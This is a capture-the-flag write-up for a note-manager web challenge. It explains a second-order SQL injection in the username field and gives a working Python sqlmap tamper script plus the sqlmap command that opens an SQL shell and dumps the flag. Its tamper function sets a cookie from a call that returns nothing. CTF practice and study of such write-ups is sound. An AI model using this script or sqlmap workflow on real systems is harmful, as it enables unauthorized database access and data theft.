Description

La ShadowLeague vous met gracieusement à disposition un gestionnaire de notes. Not bad, huh ?

http://quals.shadow-league.org:8001

**Aucun bruteforce n’est autorisé sur cette épreuve**

Resolution

There was a second order SQL injection in username, while retrieving user’s notes.

“There are two types of SQL injection: those I do with SQLMAP and those I would not do.”
me – circa 2019

We needed a tamper script to let SQLMAP do its magic.  We had already seen almost exactly the same injection in the HTB VM “nightmare”, this write up sum it all.

#!/usr/bin/env python

import re
import requests

def create_account(payload):
    s = requests.Session()

    proxies = { 'socks':'http://127.0.0.1:9052' }

    params = (
	    ('username', payload),
	    ('password', '0x90r00t'),
	    )

    headers = {
	    'Host': 'quals.shadow-league.org:8001',
	    'Upgrade-Insecure-Requests': '1',
	    'DNT': '1',
	    'User-Agent': 'I m a teapot',
	    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
	    'Referer': 'http://quals.shadow-league.org:8001/home.php',
	    'Accept-Encoding': 'gzip, deflate',
	    'Accept-Language': 'tr-TR',
	    'Connection': 'close',
	    }

    print("Creating ", payload)
    response = s.get('http://quals.shadow-league.org:8001/register.php', headers=headers, params=params, verify=False, proxies=proxies)

def tamper(payload, **kwargs):
    headers = kwargs.get("headers", {})
    headers["Cookie"] = create_account(payload)
    return payload

Once the tamper’s ready, we launched SQLMAP:

me@sec: proxychains sqlmap -u "http://quals.shadow-league.org:8001/index.php?username=nopnopnop&password=0x90r00t" --tamper tampere.py --tables -p username --risk 3 --level 5 --sql-shell --fresh-queries

And waited for the sql-shell apparition.

A SELECT query and the flag was ours:

select password from user limit 1:    'SCE{sQl_fl4g3d_f0r_th3_w1n!}' 

 

Flag was SCE{sQl_fl4g3d_f0r_th3_w1n!}